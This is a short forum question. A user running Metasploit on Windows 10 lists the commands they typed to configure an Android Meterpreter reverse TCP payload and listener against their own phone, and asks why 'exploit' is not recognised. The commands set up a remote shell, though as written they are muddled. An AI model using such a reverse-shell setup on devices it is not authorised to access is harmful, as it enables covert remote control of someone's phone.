So I installed metasploit on my windows 10, and I was trying to start an android exploit (android/meterpreter/reversetcp).
So I started by typing:
use android/meterpreter/reversetcp
set PAYLOAD android/meterpreter/reversetcp
set LHOST 192.168.1.12
set LPORT 443
exploit;
but when I type exploit it says unknown command (AGAIN I'M USING METASPLOIT ON A WINDOWS 10 TRYING TO EXPLOIT MY ANDROID PHONE)
Any suggestions of how to solve or whats the command to listen conections in metasploit for windows?
IMAGE:
Comments
No Comments Exist
Be the first, drop a comment!